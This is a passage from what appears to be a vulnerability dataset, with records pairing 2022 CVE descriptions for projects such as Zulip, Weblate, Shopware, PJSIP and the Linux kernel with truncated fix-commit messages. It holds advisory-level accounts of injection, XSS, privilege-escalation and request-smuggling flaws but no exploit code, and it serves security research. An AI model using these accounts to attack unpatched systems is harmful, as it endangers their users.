'b2-sdk-python is a python library to access cloud storage provided by backblaze. Linux and Mac releases of the SDK version 1.14.0 and below contain a key disclosure vulnerability that, in certain conditions, can be exploited by local attackers through a time-of-check-time-of-use (TOCTOU) race condition. SDK users of the SqliteAccountInfo format are vulnerable while users of the InMemoryAccountInfo format are safe. The SqliteAccountInfo saves API key", "cve_id": "CVE-2022-23651", "source": "cvefixes", "timestamp": ""} {"id": "12af25fc40719869170f", "text": "CVE: CVE-2022-23652\n\n[{'lang': 'en', 'value': 'capsule-proxy is a reverse proxy for Capsule Operator which provides multi-tenancy in Kubernetes. In versions prior to 0.2.1 an attacker with a proper authentication mechanism may use a malicious `Connection` header to start a privilege escalation attack towards the Kubernetes API Server. This vulnerability allows for an exploit of the `cluster-admin` Role bound to `capsule-proxy`. There are no known workarounds for this issue.'}]\n\nFix commit: bug: ", "cve_id": "CVE-2022-23652", "source": "cvefixes", "timestamp": ""} {"id": "f148a03f0e372e1a231a", "text": "CVE: CVE-2022-23653\n\n[{'lang': 'en', 'value': 'B2 Command Line Tool is the official command line tool for the backblaze cloud storage service. Linux and Mac releases of the B2 command-line tool version 3.2.0 and below contain a key disclosure vulnerability that, in certain conditions, can be exploited by local attackers through a time-of-check-time-of-use (TOCTOU) race condition. The command line tool saves API keys (and bucket name-to-id mapping) in a local database file (`$XDG_CONFIG_HOME/b2/a", "cve_id": "CVE-2022-23653", "source": "cvefixes", "timestamp": ""} {"id": "6d6d47108795165a21b9", "text": "CVE: CVE-2022-23654\n\n[{'lang': 'en', 'value': 'Wiki.js is a wiki app built on Node.js. In affected versions an authenticated user with write access on a restricted set of paths can update a page outside the allowed paths by specifying a different target page ID while keeping the path intact. The access control incorrectly check the path access against the user-provided values instead of the actual path associated to the page ID. Commit https://github.com/Requarks/wiki/commit/411802ec2f654bb5ed11", "cve_id": "CVE-2022-23654", "source": "cvefixes", "timestamp": ""} {"id": "eda6bab70f16ac6a9d76", "text": "CVE: CVE-2022-23656\n\n[{'lang': 'en', 'value': 'Zulip is an open source team chat app. The `main` development branch of Zulip Server from June 2021 and later is vulnerable to a cross-site scripting vulnerability on the recent topics page. An attacker could maliciously craft a full name for their account and send messages to a topic with several participants; a victim who then opens an overflow tooltip including this full name on the recent topics page could trigger execution of JavaScript code co", "cve_id": "CVE-2022-23656", "source": "cvefixes", "timestamp": ""} {"id": "b7e134e536d00ea160cd", "text": "CVE: CVE-2022-2368\n\n[{'lang': 'en', 'value': 'Business Logic Errors in GitHub repository microweber/microweber prior to 1.2.20.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2368", "source": "cvefixes", "timestamp": ""} {"id": "05cb6127a5b8d89c0e54", "text": "CVE: CVE-2022-23812\n\n[{'lang': 'en', 'value': 'This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don\\'t run it! js im", "cve_id": "CVE-2022-23812", "source": "cvefixes", "timestamp": ""} {"id": "71f91e455d3c39cec751", "text": "CVE: CVE-2022-23837\n\n[{'lang': 'en', 'value': 'In api.rb in Sidekiq before 5.2.10 and 6.4.0, there is no limit on the number of days when requesting stats for the graph. This overloads the system, affecting the Web UI, and makes it unavailable to users.'}]\n\nFix commit: Validate `days` parameter to avoid possible DoS in Web UI\n\nThank you to Sergey Shpakov of http://tutum.space for reporting.", "cve_id": "CVE-2022-23837", "source": "cvefixes", "timestamp": ""} {"id": "8dcbca45e347b86006a6", "text": "CVE: CVE-2022-23857\n\n[{'lang': 'en', 'value': \"model/criteria/criteria.go in Navidrome before 0.47.5 is vulnerable to SQL injection attacks when processing crafted Smart Playlists. An authenticated user could abuse this to extract arbitrary data from the database, including the user table (which contains sensitive information such as the users' encrypted passwords).\"}]\n\nFix commit: Fix potential SQL injection in Smart Playlists", "cve_id": "CVE-2022-23857", "source": "cvefixes", "timestamp": ""} {"id": "65f58797c4c5b270770c", "text": "CVE: CVE-2022-23935\n\n[{'lang': 'en', 'value': 'lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\\\\|$/ check, leading to command injection.'}]\n\nFix commit: Update to 12.38", "cve_id": "CVE-2022-23935", "source": "cvefixes", "timestamp": ""} {"id": "f94315d2efad05a0c911", "text": "CVE: CVE-2022-23993\n\n[{'lang': 'en', 'value': \"/usr/local/www/pkg.php in pfSense CE before 2.6.0 and pfSense Plus before 22.01 uses $_REQUEST['pkg_filter'] in a PHP echo call, causing XSS.\"}]\n\nFix commit: Clean up pkg filter text before use. Fixes #12725\n\nAlso remove unnecessary echos of the value.", "cve_id": "CVE-2022-23993", "source": "cvefixes", "timestamp": ""} {"id": "827cb843ffab392374bf", "text": "CVE: CVE-2022-2400\n\n[{'lang': 'en', 'value': 'External Control of File Name or Path in GitHub repository dompdf/dompdf prior to 2.0.0.'}]\n\nFix commit: Update resource URI validation and handling\n\nURI scheme (protocol) validation rules are now specified through the Options class. By default file and http(s) URIs are allowed and validation rules defined. Validation rules for PHAR URIs are defined but the scheme is not enabled by default.\n\nResource retrieval has been updated to use file_get_content", "cve_id": "CVE-2022-2400", "source": "cvefixes", "timestamp": ""} {"id": "9f18e7649e5c3dd4df8d", "text": "CVE: CVE-2022-24065\n\n[{'lang': 'en', 'value': 'The package cookiecutter before 2.1.1 are vulnerable to Command Injection via hg argument injection. When calling the cookiecutter function from Python code with the checkout parameter, it is passed to the hg checkout command in a way that additional flags can be set. The additional flags can be used to perform a command injection.'}]\n\nFix commit: Merge pull request #1689 from cookiecutter/sanitize-mercurial-checkout\n\nSanitize Mercurial branch infor", "cve_id": "CVE-2022-24065", "source": "cvefixes", "timestamp": ""} {"id": "b9165e548837c6a41473", "text": "CVE: CVE-2022-24066\n\n[{'lang': 'en', 'value': \"The package simple-git before 3.5.0 are vulnerable to Command Injection due to an incomplete fix of [CVE-2022-24433](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2421199) which only patches against the git fetch attack vector. A similar use of the --upload-pack feature of git is also supported for git clone, which the prior fix didn't cover.\"}]\n\nFix commit: Prevent use of `--upload-pack` as a command in `git.clone` to avoid potential accidental c", "cve_id": "CVE-2022-24066", "source": "cvefixes", "timestamp": ""} {"id": "9f5d5338c46a773d5f46", "text": "CVE: CVE-2022-24122\n\n[{'lang': 'en', 'value': 'kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace.'}]\n\nFix commit: ucount: Make get_ucount a safe get_user replacement\n\nWhen the ucount code was refactored to create get_ucount it was missed\nthat some of the contexts in which a rlimit is kept elevated can be\nthe only reference to the user/ucount i", "cve_id": "CVE-2022-24122", "source": "cvefixes", "timestamp": ""} {"id": "464ec44e33d30c53b87c", "text": "CVE: CVE-2022-24193\n\n[{'lang': 'en', 'value': 'CasaOS before v0.2.7 was discovered to contain a command injection vulnerability.'}]\n\nFix commit: Apply multilingual support", "cve_id": "CVE-2022-24193", "source": "cvefixes", "timestamp": ""} {"id": "560e22858201de0f2d8a", "text": "CVE: CVE-2022-24278\n\n[{'lang': 'en', 'value': 'The package convert-svg-core before 0.6.4 are vulnerable to Directory Traversal due to improper sanitization of SVG tags. Exploiting this vulnerability is possible by using a specially crafted SVG file.'}]\n\nFix commit: Convert only first SVG element from input\n\nIf the input to be converted contains multiple SVG elements, only the first SVG element should be converted. Currently, and undesirably, all SVG elements were being inserted into the page wit", "cve_id": "CVE-2022-24278", "source": "cvefixes", "timestamp": ""} {"id": "1087810edbe10c53a87f", "text": "CVE: CVE-2022-24279\n\n[{'lang': 'en', 'value': 'The package madlib-object-utils before 0.1.8 are vulnerable to Prototype Pollution via the setValue method, as it allows an attacker to merge object prototypes into it. *Note:* This vulnerability derives from an incomplete fix of [CVE-2020-7701](https://security.snyk.io/vuln/SNYK-JS-MADLIBOBJECTUTILS-598676)'}]\n\nFix commit: fix(set-value): prototype pollution", "cve_id": "CVE-2022-24279", "source": "cvefixes", "timestamp": ""} {"id": "168ad749e6419a88a45c", "text": "CVE: CVE-2022-24300\n\n[{'lang': 'en', 'value': 'Minetest before 5.4.0 allows attackers to add or modify arbitrary meta fields of the same item stack as saved user input, aka ItemStack meta injection.'}]\n\nFix commit: Sanitize ItemStack meta text", "cve_id": "CVE-2022-24300", "source": "cvefixes", "timestamp": ""} {"id": "26c06bbeb60712aec2b1", "text": "CVE: CVE-2022-24301\n\n[{'lang': 'en', 'value': \"In Minetest before 5.4.0, players can add or subtract items from a different player's inventory.\"}]\n\nFix commit: Prevent players accessing inventories of other players (#10341)", "cve_id": "CVE-2022-24301", "source": "cvefixes", "timestamp": ""} {"id": "843a51f177dd2d2e9437", "text": "CVE: CVE-2022-24304\n\n[{'lang': 'en', 'value': 'Schema in lib/schema.js in Mongoose before 6.4.6 is vulnerable to prototype pollution.'}]\n\nFix commit: fix(schema): disallow setting __proto__ when creating schema with dotted properties\n\nFix #12085", "cve_id": "CVE-2022-24304", "source": "cvefixes", "timestamp": ""} {"id": "c00ee71261f1a5da8df9", "text": "CVE: CVE-2022-24375\n\n[{'lang': 'en', 'value': 'The package node-opcua before 2.74.0 are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple CloseSession requests with the deleteSubscription parameter equal to False.'}]\n\nFix commit: server: fix Subscription.modify assert", "cve_id": "CVE-2022-24375", "source": "cvefixes", "timestamp": ""} {"id": "8c4ff036e34d03562b8b", "text": "CVE: CVE-2022-24375\n\n[{'lang': 'en', 'value': 'The package node-opcua before 2.74.0 are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple CloseSession requests with the deleteSubscription parameter equal to False.'}]\n\nFix commit: server: use ServiceFault on request error", "cve_id": "CVE-2022-24375", "source": "cvefixes", "timestamp": ""} {"id": "f75507796e3e745ac1a3", "text": "CVE: CVE-2022-24429\n\n[{'lang': 'en', 'value': 'The package convert-svg-core before 0.6.3 are vulnerable to Arbitrary Code Injection when using a specially crafted SVG file. An attacker can read arbitrary files from the file system and then show the file content as a converted PNG file.'}]\n\nFix commit: Remove all disallowed SVG element attributes\n\nIn a further attempt to reduce remote code injection attack vectors, all attributes except for a set of allowed standard attributes are removed from th", "cve_id": "CVE-2022-24429", "source": "cvefixes", "timestamp": ""} {"id": "836323cf215a782024d5", "text": "CVE: CVE-2022-24437\n\n[{'lang': 'en', 'value': 'The package git-pull-or-clone before 2.0.2 are vulnerable to Command Injection due to the use of the --upload-pack feature of git which is also supported for git clone. The source includes the use of the secure child process API spawn(). However, the outpath parameter passed to it may be a command-line argument to the git clone command and result in arbitrary command injection.'}]\n\nFix commit: fix: fix command injection vector", "cve_id": "CVE-2022-24437", "source": "cvefixes", "timestamp": ""} {"id": "678c617cda79453e2157", "text": "CVE: CVE-2022-24448\n\n[{'lang': 'en', 'value': 'An issue was discovered in fs/nfs/dir.c in the Linux kernel before 5.16.5. If an application sets the O_DIRECTORY flag, and tries to open a regular file, nfs_atomic_open() performs a regular lookup. If a regular file is found, ENOTDIR should occur, but the server instead returns uninitialized data in the file descriptor.'}]\n\nFix commit: NFSv4: Handle case where the lookup of a directory fails\n\nIf the application sets the O_DIRECTORY flag, and tries ", "cve_id": "CVE-2022-24448", "source": "cvefixes", "timestamp": ""} {"id": "9964dbdf0328ec6cc75d", "text": "CVE: CVE-2022-24448\n\n[{'lang': 'en', 'value': 'An issue was discovered in fs/nfs/dir.c in the Linux kernel before 5.16.5. If an application sets the O_DIRECTORY flag, and tries to open a regular file, nfs_atomic_open() performs a regular lookup. If a regular file is found, ENOTDIR should occur, but the server instead returns uninitialized data in the file descriptor.'}]\n\nFix commit: Revert \"NFSv4: Handle the special Linux file open access mode\"\n\nThis reverts commit 44942b4e457beda00981f616402a1a", "cve_id": "CVE-2022-24448", "source": "cvefixes", "timestamp": ""} {"id": "8229e0241f51ccf68546", "text": "CVE: CVE-2022-2453\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository gpac/gpac prior to 2.1-DEV.'}]\n\nFix commit: fixed #2212", "cve_id": "CVE-2022-2453", "source": "cvefixes", "timestamp": ""} {"id": "b2afb7e0b2488e7273b1", "text": "CVE: CVE-2022-2454\n\n[{'lang': 'en', 'value': 'Integer Overflow or Wraparound in GitHub repository gpac/gpac prior to 2.1-DEV.'}]\n\nFix commit: fixed #2213", "cve_id": "CVE-2022-2454", "source": "cvefixes", "timestamp": ""} {"id": "3c6a6b982ba4bdd68af6", "text": "CVE: CVE-2022-2470\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2470", "source": "cvefixes", "timestamp": ""} {"id": "4d6b0d83eea56ac2e436", "text": "CVE: CVE-2022-24707\n\n[{'lang': 'en', 'value': 'Anuko Time Tracker is an open source, web-based time tracking application written in PHP. UNION SQL injection and time-based blind injection vulnerabilities existed in Time Tracker Puncher plugin in versions of anuko timetracker prior to 1.20.0.5642. This was happening because the Puncher plugin was reusing code from other places and was relying on an unsanitized date parameter in POST requests. Because the parameter was not checked, it was possible", "cve_id": "CVE-2022-24707", "source": "cvefixes", "timestamp": ""} {"id": "5463b4fc2de8faaf8260", "text": "CVE: CVE-2022-24708\n\n[{'lang': 'en', 'value': 'Anuko Time Tracker is an open source, web-based time tracking application written in PHP. ttUser.class.php in Time Tracker versions prior to 1.20.0.5646 was not escaping primary group name for display. Because of that, it was possible for a logged in user to modify primary group name with elements of JavaScript. Such script could then be executed in user browser on subsequent requests on pages where primary group name was displayed. This is vulnerab", "cve_id": "CVE-2022-24708", "source": "cvefixes", "timestamp": ""} {"id": "173a6cd345a5860bf3f1", "text": "CVE: CVE-2022-24710\n\n[{'lang': 'en', 'value': 'Weblate is a copyleft software web-based continuous localization system. Versions prior to 4.11 do not properly neutralize user input used in user name and language fields. Due to this improper neutralization it is possible to perform cross-site scripting via these fields. The issues were fixed in the 4.11 release. Users unable to upgrade are advised to add their own neutralize logic.'}]\n\nFix commit: translate: Add missing escaping to language name\n", "cve_id": "CVE-2022-24710", "source": "cvefixes", "timestamp": ""} {"id": "664a366740ba8b088c44", "text": "CVE: CVE-2022-24710\n\n[{'lang': 'en', 'value': 'Weblate is a copyleft software web-based continuous localization system. Versions prior to 4.11 do not properly neutralize user input used in user name and language fields. Due to this improper neutralization it is possible to perform cross-site scripting via these fields. The issues were fixed in the 4.11 release. Users unable to upgrade are advised to add their own neutralize logic.'}]\n\nFix commit: js: Add missing escaping to username completion\n\n", "cve_id": "CVE-2022-24710", "source": "cvefixes", "timestamp": ""} {"id": "e1c71edbc025415e5595", "text": "CVE: CVE-2022-24710\n\n[{'lang': 'en', 'value': 'Weblate is a copyleft software web-based continuous localization system. Versions prior to 4.11 do not properly neutralize user input used in user name and language fields. Due to this improper neutralization it is possible to perform cross-site scripting via these fields. The issues were fixed in the 4.11 release. Users unable to upgrade are advised to add their own neutralize logic.'}]\n\nFix commit: reports: Escape user names in generated reports\n\n", "cve_id": "CVE-2022-24710", "source": "cvefixes", "timestamp": ""} {"id": "70cc9e8516ccfa602e67", "text": "CVE: CVE-2022-24711\n\n[{'lang': 'en', 'value': 'CodeIgniter4 is the 4.x branch of CodeIgniter, a PHP full-stack web framework. Prior to version 4.1.9, an improper input validation vulnerability allows attackers to execute CLI routes via HTTP request. Version 4.1.9 contains a patch. There are currently no known workarounds for this vulnerability.'}]\n\nFix commit: Merge pull request from GHSA-xjp4-6w75-qrj7\n\nHotfix 4.1.9", "cve_id": "CVE-2022-24711", "source": "cvefixes", "timestamp": ""} {"id": "0a3efec598c8e17baef0", "text": "CVE: CVE-2022-24713\n\n[{'lang': 'en', 'value': \"regex is an implementation of regular expressions for the Rust language. The regex crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. Unfortunately a bug was discovered in the mitigations designed to pre", "cve_id": "CVE-2022-24713", "source": "cvefixes", "timestamp": ""} {"id": "bf424d1a14afe6aec94a", "text": "CVE: CVE-2022-24717\n\n[{'lang': 'en', 'value': 'ssr-pages is an HTML page builder for the purpose of server-side rendering (SSR). In versions prior to 0.1.5, a cross site scripting (XSS) issue can occur when providing untrusted input to the `redirect.link` property as an argument to the `build(MessagePageOptions)` function. While there is no known workaround at this time, there is a patch in version 0.1.5.'}]\n\nFix commit: fix string encoder", "cve_id": "CVE-2022-24717", "source": "cvefixes", "timestamp": ""} {"id": "536a5f8616b93ef2aadd", "text": "CVE: CVE-2022-24719\n\n[{'lang': 'en', 'value': 'Fluture-Node is a FP-style HTTP and streaming utils for Node based on Fluture. Using `followRedirects` or `followRedirectsWith` with any of the redirection strategies built into fluture-node 4.0.0 or 4.0.1, paired with a request that includes confidential headers such as Authorization or Cookie, exposes you to a vulnerability where, if the destination server were to redirect the request to a server on a third-party domain, or the same domain over un", "cve_id": "CVE-2022-24719", "source": "cvefixes", "timestamp": ""} {"id": "843900ee51f3ae555481", "text": "CVE: CVE-2022-24720\n\n[{'lang': 'en', 'value': 'image_processing is an image processing wrapper for libvips and ImageMagick/GraphicsMagick. Prior to version 1.12.2, using the `#apply` method from image_processing to apply a series of operations that are coming from unsanitized user input allows the attacker to execute shell commands. This method is called internally by Active Storage variants, so Active Storage is vulnerable as well. The vulnerability has been fixed in version 1.12.2 of image_pro", "cve_id": "CVE-2022-24720", "source": "cvefixes", "timestamp": ""} {"id": "6f0c2b94bf0fcd20d277", "text": "CVE: CVE-2022-24722\n\n[{'lang': 'en', 'value': 'VIewComponent is a framework for building view components in Ruby on Rails. Versions prior to 2.31.2 and 2.49.1 contain a cross-site scripting vulnerability that has the potential to impact anyone using translations with the view_component gem. Data received via user input and passed as an interpolation argument to the `translate` method is not properly sanitized before display. Versions 2.31.2 and 2.49.1 have been released and fully mitigate the vu", "cve_id": "CVE-2022-24722", "source": "cvefixes", "timestamp": ""} {"id": "71fc69319d7a1098d98e", "text": "CVE: CVE-2022-24723\n\n[{'lang': 'en', 'value': 'URI.js is a Javascript URL mutation library. Before version 1.19.9, whitespace characters are not removed from the beginning of the protocol, so URLs are not parsed properly. This issue has been patched in version 1.19.9. Removing leading whitespace from values before passing them to URI.parse can be used as a workaround.'}]\n\nFix commit: fix(parse): remove leading whitespace\n\nreported by @p0cas via huntr.dev", "cve_id": "CVE-2022-24723", "source": "cvefixes", "timestamp": ""} {"id": "9d06e64e3011d7c7e57e", "text": "CVE: CVE-2022-24728\n\n[{'lang': 'en', 'value': 'CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.'}]\n\nFix com", "cve_id": "CVE-2022-24728", "source": "cvefixes", "timestamp": ""} {"id": "3b4234c7d4100367921d", "text": "CVE: CVE-2022-24732\n\n[{'lang': 'en', 'value': 'Maddy Mail Server is an open source SMTP compatible email server. Versions of maddy prior to 0.5.4 do not implement password expiry or account expiry checking when authenticating using PAM. Users are advised to upgrade. Users unable to upgrade should manually remove expired accounts via existing filtering mechanisms.'}]\n\nFix commit: auth/pam: Check for account/password expiry\n\nSee GHSA-6cp7-g972-w9m9. Thanks Youssef Rebahi-Gilbert (ysf) for\nreportin", "cve_id": "CVE-2022-24732", "source": "cvefixes", "timestamp": ""} {"id": "c339ad93c28be3b69aea", "text": "CVE: CVE-2022-24734\n\n[{'lang': 'en', 'value': \"MyBB is a free and open source forum software. In affected versions the Admin CP's Settings management module does not validate setting types correctly on insertion and update, making it possible to add settings of supported type `php` with PHP code, executed on on _Change Settings_ pages. This results in a Remote Code Execution (RCE) vulnerability. The vulnerable module requires Admin CP access with the `Can manage settings?` permission. MyBB's Set", "cve_id": "CVE-2022-24734", "source": "cvefixes", "timestamp": ""} {"id": "effaf183c34b439e623a", "text": "CVE: CVE-2022-24737\n\n[{'lang': 'en', 'value': 'HTTPie is a command-line HTTP client. HTTPie has the practical concept of sessions, which help users to persistently store some of the state that belongs to the outgoing requests and incoming responses on the disk for further usage. Before 3.1.0, HTTPie didn‘t distinguish between cookies and hosts they belonged. This behavior resulted in the exposure of some cookies when there are redirects originating from the actual host to a third party website. ", "cve_id": "CVE-2022-24737", "source": "cvefixes", "timestamp": ""} {"id": "2d46ff91ea3d2b11b3a5", "text": "CVE: CVE-2022-24738\n\n[{'lang': 'en', 'value': 'Evmos is the Ethereum Virtual Machine (EVM) Hub on the Cosmos Network. In versions of evmos prior to 2.0.1 attackers are able to drain unclaimed funds from user addresses. To do this an attacker must create a new chain which does not enforce signature verification and connects it to the target evmos instance. The attacker can use this joined chain to transfer unclaimed funds. Users are advised to upgrade. There are no known workarounds for this issu", "cve_id": "CVE-2022-24738", "source": "cvefixes", "timestamp": ""} {"id": "34257d61733134753a12", "text": "CVE: CVE-2022-24739\n\n[{'lang': 'en', 'value': 'alltube is an html front end for youtube-dl. On releases prior to 3.0.3, an attacker could craft a special HTML page to trigger either an open redirect attack or a Server-Side Request Forgery attack (depending on how AllTube is configured). The impact is mitigated by the fact the SSRF attack is only possible when the `stream` option is enabled in the configuration. (This option is disabled by default.) 3.0.3 contains a fix for this vulnerability.'}]", "cve_id": "CVE-2022-24739", "source": "cvefixes", "timestamp": ""} {"id": "9f23f995c0ad08d30db2", "text": "CVE: CVE-2022-24746\n\n[{'lang': 'en', 'value': 'Shopware is an open commerce platform based on the Symfony php Framework and the Vue javascript framework. In affected versions it is possible to inject code via the voucher code form. This issue has been patched in version 6.4.8.1. There are no known workarounds for this issue.'}]\n\nFix commit: NEXT-19276 - Add filtering to promotion and product codes", "cve_id": "CVE-2022-24746", "source": "cvefixes", "timestamp": ""} {"id": "0edacc2ba995f2c48ad1", "text": "CVE: CVE-2022-24747\n\n[{'lang': 'en', 'value': 'Shopware is an open commerce platform based on the Symfony php Framework and the Vue javascript framework. Affected versions of shopware do no properly set sensitive HTTP headers to be non-cacheable. If there is an HTTP cache between the server and client then headers may be exposed via HTTP caches. This issue has been resolved in version 6.4.8.2. There are no known workarounds.'}]\n\nFix commit: NEXT-20309 - Fix cache control", "cve_id": "CVE-2022-24747", "source": "cvefixes", "timestamp": ""} {"id": "8d7031f4039779929d0d", "text": "CVE: CVE-2022-24748\n\n[{'lang': 'en', 'value': 'Shopware is an open commerce platform based on the Symfony php Framework and the Vue javascript framework. In versions prior to 6.4.8.2 it is possible to modify customers and to create orders without App Permission. This issue is a result of improper api route checking. Users are advised to upgrade to version 6.4.8.2. There are no known workarounds.'}]\n\nFix commit: NEXT-20305 - Secure proxy route to switch customer with ACL", "cve_id": "CVE-2022-24748", "source": "cvefixes", "timestamp": ""} {"id": "cb191eeef4e2a322b0f4", "text": "CVE: CVE-2022-24750\n\n[{'lang': 'en', 'value': 'UltraVNC is a free and open source remote pc access software. A vulnerability has been found in versions prior to 1.3.8.0 in which the DSM plugin module, which allows a local authenticated user to achieve local privilege escalation (LPE) on a vulnerable system. The vulnerability has been fixed to allow loading of plugins from the installed directory. Affected users should upgrade their UltraVNC to 1.3.8.0. Users unable to upgrade should not install ", "cve_id": "CVE-2022-24750", "source": "cvefixes", "timestamp": ""} {"id": "c51298199bb723171997", "text": "CVE: CVE-2022-24751\n\n[{'lang': 'en', 'value': 'Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where a simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate", "cve_id": "CVE-2022-24751", "source": "cvefixes", "timestamp": ""} {"id": "314d5a7d85f5b75cd247", "text": "CVE: CVE-2022-24752\n\n[{'lang': 'en', 'value': 'SyliusGridBundle is a package of generic data grids for Symfony applications. Prior to versions 1.10.1 and 1.11-rc2, values added at the end of query sorting were passed directly to the database. The maintainers do not know if this could lead to direct SQL injections but took steps to remediate the vulnerability. The issue is fixed in versions 1.10.1 and 1.11-rc2. As a workaround, overwrite the`Sylius\\\\Component\\\\Grid\\\\Sorting\\\\Sorter.php` class and", "cve_id": "CVE-2022-24752", "source": "cvefixes", "timestamp": ""} {"id": "5c2a9b998ce53b1f8bf9", "text": "CVE: CVE-2022-24753\n\n[{'lang': 'en', 'value': 'Stripe CLI is a command-line tool for the Stripe eCommerce platform. A vulnerability in Stripe CLI exists on Windows when certain commands are run in a directory where an attacker has planted files. The commands are `stripe login`, `stripe config -e`, `stripe community`, and `stripe open`. MacOS and Linux are unaffected. An attacker who successfully exploits the vulnerability can run arbitrary code in the context of the current user. The update addr", "cve_id": "CVE-2022-24753", "source": "cvefixes", "timestamp": ""} {"id": "be748b5bc462c6426537", "text": "CVE: CVE-2022-24754\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C language. In versions prior to and including 2.12 PJSIP there is a stack-buffer overflow vulnerability which only impacts PJSIP users who accept hashed digest credentials (credentials with data_type `PJSIP_CRED_DATA_DIGEST`). This issue has been patched in the master branch of the PJSIP repository and will be included with the next release. Users unable to upgrade need to ", "cve_id": "CVE-2022-24754", "source": "cvefixes", "timestamp": ""} {"id": "0e7d1a24f03da26f22bb", "text": "CVE: CVE-2022-24757\n\n[{'lang': 'en', 'value': 'The Jupyter Server provides the backend (i.e. the core services, APIs, and REST endpoints) for Jupyter web applications. Prior to version 1.15.4, unauthorized actors can access sensitive information from server logs. Anytime a 5xx error is triggered, the auth cookie and other header values are recorded in Jupyter Server logs by default. Considering these logs do not require root access, an attacker can monitor these logs, steal sensitive auth/cookie", "cve_id": "CVE-2022-24757", "source": "cvefixes", "timestamp": ""} {"id": "6a93bd47bde882a10426", "text": "CVE: CVE-2022-24761\n\n[{'lang': 'en', 'value': \"Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that ma", "cve_id": "CVE-2022-24761", "source": "cvefixes", "timestamp": ""} {"id": "7da217c0aa78b92891af", "text": "CVE: CVE-2022-24762\n\n[{'lang': 'en', 'value': 'sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messa", "cve_id": "CVE-2022-24762", "source": "cvefixes", "timestamp": ""} {"id": "d55b2c81d93d4e563981", "text": "CVE: CVE-2022-24763\n\n[{'lang': 'en', 'value': \"PJSIP is a free and open source multimedia communication library written in the C language. Versions 2.12 and prior contain a denial-of-service vulnerability that affects PJSIP users that consume PJSIP's XML parsing in their apps. Users are advised to update. There are no known workarounds.\"}]\n\nFix commit: Merge pull request from GHSA-5x45-qp78-g4p4\n\n* Prevent infinite loop in scanning xml content\n\n* Simplify scanning method\n\n* Optimization", "cve_id": "CVE-2022-24763", "source": "cvefixes", "timestamp": ""} {"id": "ec1ce4e25226423438f8", "text": "CVE: CVE-2022-24764\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C. Versions 2.12 and prior contain a stack buffer overflow vulnerability that affects PJSUA2 users or users that call the API `pjmedia_sdp_print(), pjmedia_sdp_media_print()`. Applications that do not use PJSUA2 and do not directly call `pjmedia_sdp_print()` or `pjmedia_sdp_media_print()` should not be affected. A patch is available on the `master` branch of the `pjsip/pjpro", "cve_id": "CVE-2022-24764", "source": "cvefixes", "timestamp": ""} {"id": "cd5038584fc57e226561", "text": "CVE: CVE-2022-24766\n\n[{'lang': 'en', 'value': \"mitmproxy is an interactive, SSL/TLS-capable intercepting proxy. In mitmproxy 7.0.4 and below, a malicious client or server is able to perform HTTP request smuggling attacks through mitmproxy. This means that a malicious client/server could smuggle a request/response through mitmproxy as part of another request/response's HTTP message body. While mitmproxy would only see one request, the target server would see multiple requests. A smuggled request ", "cve_id": "CVE-2022-24766", "source": "cvefixes", "timestamp": ""} {"id": "caff2f5e0fbff3d6a91a", "text": "CVE: CVE-2022-24768\n\n[{'lang': 'en', 'value': \"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All unpatched versions of Argo CD starting with 1.0.0 are vulnerable to an improper access control bug, allowing a malicious user to potentially escalate their privileges to admin-level. Versions starting with 0.8.0 and 0.5.0 contain limited versions of this issue. To perform exploits, an authorized Argo CD user must have push access to an Application's source git or Helm repo", "cve_id": "CVE-2022-24768", "source": "cvefixes", "timestamp": ""} {"id": "084647247b6feaa02db2", "text": "CVE: CVE-2022-24769\n\n[{'lang': 'en', 'value': \"Moby is an open-source project created by Docker to enable and accelerate software containerization. A bug was found in Moby (Docker Engine) prior to version 20.10.14 where containers were incorrectly started with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during `execve(2)`. Normally, when executa", "cve_id": "CVE-2022-24769", "source": "cvefixes", "timestamp": ""} {"id": "d1ca6824a5e758cb1668", "text": "CVE: CVE-2022-24770\n\n[{'lang': 'en', 'value': \"`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the 